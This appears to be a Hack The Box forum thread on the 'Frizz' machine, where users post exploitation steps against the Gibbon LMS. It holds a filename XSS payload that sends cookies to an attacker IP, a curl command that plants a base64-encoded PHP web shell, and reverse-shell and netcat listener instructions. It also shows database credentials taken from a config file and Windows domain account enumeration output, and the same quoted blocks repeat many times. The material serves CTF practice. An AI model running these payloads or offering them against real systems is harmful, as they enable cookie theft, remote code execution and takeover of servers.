[cavour13]

$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

[Adith19051905]

I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

[VoidNull]

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nc -lvnp XXX

Im running around trying to find a user flag

[adrianhack]

I tried those credentials with system users using netexec smb * but no sucess

[pop10189]

I tried those credentials with system users using netexec smb * but no sucess

it's not a domain user + NTLM is dispaled

[kyakeiuwu]

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nv -lvnp XXX

Im running around trying to find a user flag

nope doesnt work for me

[VoidNull]

So, if anyone didnt get it, the host is the domain controller AFAIK.

The following users are present:

PS C:\Windows> net user
User accounts for \\FRIZZDC

-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice


And we might be able to leverage the following information about the Administrator

PS C:\Windows> net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/25/2025 2:24:10 PM
Password expires Never
Password changeable 2/25/2025 2:24:10 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/15/2025 6:56:18 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *Domain Admins *Domain Users
*Group Policy Creator *Schema Admins
*Enterprise Admins
The command completed successfully.

[pop10189]

Anyone managed to crack the hash of f.frizzle ?

[eyalzaba]

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nv -lvnp XXX

Im running around trying to find a user flag

nope doesnt work for me

try to use urlencode...

[kyakeiuwu]

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

uploaded the file but nothing happening.

I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

how did you manage to get shell

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nv -lvnp XXX

Im running around trying to find a user flag

nope doesnt work for me

try to use urlencode...

nvm that was dumb for me lol it worked